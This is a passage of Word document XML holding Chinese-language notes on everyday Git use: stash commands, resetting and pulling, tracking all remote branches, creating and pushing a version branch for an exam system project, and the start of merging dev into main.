        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈中读取最近一次保存的内容，恢复工作区的相关内容。由于可能存在多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内容，所以用栈来管理，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会从最近的一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中读取内容并恢复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382AEF8F" w14:textId="77777777" w:rsidR="00956363" w:rsidRDefault="00956363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git stash list: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈内的所有备份，可以利用这个列表来决定从那个地方恢复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C898556" w14:textId="6235189D" w:rsidR="008D25CA" w:rsidRDefault="00956363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git stash clear: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈。此时使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等图形化工具会发现，原来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的哪些节点都消失了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D158AA8" w14:textId="6BEC83F8" w:rsidR="008D25CA" w:rsidRDefault="008D25CA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc159779519"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二：放弃本地修改，直接覆盖</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="21D2CC22" w14:textId="77777777" w:rsidR="008D25CA" w:rsidRPr="008D25CA" w:rsidRDefault="008D25CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75547F0D" w14:textId="77777777" w:rsidR="00122F46" w:rsidRDefault="00122F46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git reset --hard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C95FD77" w14:textId="3BDA7DFC" w:rsidR="005F2EC3" w:rsidRDefault="00122F46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git pull</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481FF3CE" w14:textId="0CD8F5B7" w:rsidR="000A33CF" w:rsidRDefault="000A33CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D39841" w14:textId="5E26F1A3" w:rsidR="00E80108" w:rsidRDefault="004C3BCF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc159779520"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从远程仓库获取所有分支</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="497C3B50" w14:textId="77777777" w:rsidR="004C3BCF" w:rsidRDefault="004C3BCF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F49B98" w14:textId="77777777" w:rsidR="0091544A" w:rsidRDefault="0091544A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git clone xxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026309E" w14:textId="4F01FC76" w:rsidR="00B6178E" w:rsidRDefault="00B6178E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> xxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1801F947" w14:textId="77777777" w:rsidR="0091544A" w:rsidRDefault="0091544A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git branch -r | grep -v '\-&gt;' | while read remote; do git branch --track "${remote#origin/}" "$remote"; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC4E838" w14:textId="77777777" w:rsidR="0091544A" w:rsidRDefault="0091544A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git fetch --all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142C0869" w14:textId="030D7481" w:rsidR="004C3BCF" w:rsidRPr="004C3BCF" w:rsidRDefault="0091544A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git pull --all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC8378" w14:textId="1209934A" w:rsidR="00E80108" w:rsidRDefault="005F5A28" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pull –all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在功能上包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>it fetch --all)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC3FDE" w14:textId="77777777" w:rsidR="005C5728" w:rsidRDefault="005C5728" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4322339B" w14:textId="01708098" w:rsidR="00A85CA9" w:rsidRDefault="00452F2C" w:rsidP="00452F2C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建某分支并推送至某分支</w:t>
      </w:r>
      <w:r w:rsidR="005A22E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：以考试系统</w:t>
      </w:r>
      <w:r w:rsidR="005A22E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="005A22E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为例版本管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC34D42" w14:textId="77777777" w:rsidR="00452F2C" w:rsidRDefault="00452F2C" w:rsidP="00452F2C"/>
    <w:p w14:paraId="1A60079D" w14:textId="4158F04D" w:rsidR="00452F2C" w:rsidRDefault="00D86764" w:rsidP="00452F2C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建新分支并推送至新分支之前，需要检查当前分值是否还有未提交的状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1870F33D" w14:textId="77777777" w:rsidR="00D86764" w:rsidRDefault="00D86764" w:rsidP="00452F2C"/>
    <w:p w14:paraId="2BB647C9" w14:textId="302FB051" w:rsidR="00452F2C" w:rsidRDefault="00D86764" w:rsidP="00452F2C">
      <w:r w:rsidRPr="00D86764">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git status</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以检查是否有新文件未被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>track</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2923B572" w14:textId="77777777" w:rsidR="00D86764" w:rsidRDefault="00D86764" w:rsidP="00452F2C"/>
    <w:p w14:paraId="5E90F7D1" w14:textId="519100D0" w:rsidR="00D86764" w:rsidRDefault="00D86764" w:rsidP="00D86764">
      <w:r w:rsidRPr="00D86764">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git remote -v</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86764">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看远程分值，一般如下，同一个地址具有拿下或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7FFE24" w14:textId="77777777" w:rsidR="00D86764" w:rsidRDefault="00D86764" w:rsidP="00D86764">
      <w:r>
        <w:t>origin  http://shenyanjian.cn:3000/senranja/exam_system.git (fetch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A94725" w14:textId="31FF5844" w:rsidR="00D86764" w:rsidRDefault="00D86764" w:rsidP="00D86764">
      <w:r>
        <w:t>origin  http://shenyanjian.cn:3000/senranja/exam_system.git (push)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F63B6C" w14:textId="77777777" w:rsidR="00D86764" w:rsidRDefault="00D86764" w:rsidP="00452F2C"/>
    <w:p w14:paraId="1E4328F7" w14:textId="3A6D4E1E" w:rsidR="00D86764" w:rsidRDefault="006C6DD7" w:rsidP="00452F2C">
      <w:r w:rsidRPr="006C6DD7">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="006C6DD7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿下仓库最新分值信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pull==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fetch + git merge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是安全的、不会合并的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11536F18" w14:textId="7BB53DDD" w:rsidR="00D86764" w:rsidRDefault="000C23F0" w:rsidP="00452F2C">
      <w:r w:rsidRPr="000C23F0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git branch -r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看全部的远程分支，通常显示如下：（若远程分支只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307CE965" w14:textId="77777777" w:rsidR="000C23F0" w:rsidRDefault="000C23F0" w:rsidP="000C23F0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  origin/HEAD -&gt; origin/main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246B59B" w14:textId="4312891B" w:rsidR="00D86764" w:rsidRDefault="000C23F0" w:rsidP="000C23F0">
      <w:r>
        <w:t xml:space="preserve">  origin/main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38959B6C" w14:textId="77777777" w:rsidR="00452F2C" w:rsidRDefault="00452F2C" w:rsidP="00452F2C"/>
    <w:p w14:paraId="48117702" w14:textId="0D6853E9" w:rsidR="00452F2C" w:rsidRPr="00452F2C" w:rsidRDefault="00CA2F39" w:rsidP="00452F2C">
      <w:r w:rsidRPr="00CA2F39">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git checkout -b V0.0.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以当前分支为副本创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A13905" w14:textId="67B70D80" w:rsidR="0078133E" w:rsidRDefault="00CA2F39" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA2F39">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git checkout V0.0.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换到分值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1DB62F" w14:textId="77777777" w:rsidR="0078133E" w:rsidRDefault="0078133E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349193FC" w14:textId="6349F10E" w:rsidR="005C5728" w:rsidRPr="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D049C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（现在在此处放一些部署文档、版本交付说明）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA9BE10" w14:textId="77777777" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188A0401" w14:textId="7BA4B955" w:rsidR="007D049C" w:rsidRPr="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D049C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git add .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048801A0" w14:textId="704CB14F" w:rsidR="007D049C" w:rsidRPr="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D049C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git commit -m "V0.0.2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7EC1A" w14:textId="2649DA28" w:rsidR="007D049C" w:rsidRPr="007D049C" w:rsidRDefault="007D049C" w:rsidP="007D049C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D049C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B976CB" w14:textId="77777777" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="007D049C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fatal: The current branch V0.0.2 has no upstream branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640EF8F3" w14:textId="77777777" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="007D049C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>To push the current branch and set the remote as upstream, use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D716CC0" w14:textId="77777777" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="007D049C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B02DC13" w14:textId="7365DFDB" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="007D049C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    git push --set-upstream origin V0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20238997" w14:textId="77777777" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656138D1" w14:textId="1ACA4677" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如上报错，意思是远程分值还没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>0.0.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，需要手动设置下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EC5A8" w14:textId="663C970E" w:rsidR="007D049C" w:rsidRPr="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D049C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git push --set-upstream origin V0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C58A6A2" w14:textId="4F680D62" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B2B159" w14:textId="77777777" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662E736A" w14:textId="67A4C91B" w:rsidR="007D049C" w:rsidRDefault="00665280" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换回主分支：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77299921" w14:textId="31549557" w:rsidR="00665280" w:rsidRPr="00665280" w:rsidRDefault="00665280" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665280">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00665280">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>it checkout main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000DD85D" w14:textId="77777777" w:rsidR="007D049C" w:rsidRDefault="007D049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654CCAF6" w14:textId="24C87088" w:rsidR="007D049C" w:rsidRDefault="00B42E75" w:rsidP="00763C68">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地</w:t>
      </w:r>
      <w:r w:rsidR="00763C68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并其他分支到本分支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再推送</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B873F8F" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要将本地的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dev </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支合并到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支，你可以按照以下步骤进行操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E108F" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="10EE4652" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保你当前位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支上。你可以通过以下命令来确保：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41061077" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="20B270C3" w14:textId="77777777" w:rsidR="00763C68" w:rsidRPr="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763C68">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git checkout main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789C9FE9" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="2BAF9AE4" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git pull </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来确保你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支是最新的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0069B953" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="72F753E8" w14:textId="77777777" w:rsidR="00763C68" w:rsidRPr="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763C68">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git pull origin main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155AD250" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="5842FFA2" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着，执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git merge </w:t>
      </w:r>
      <w:r>
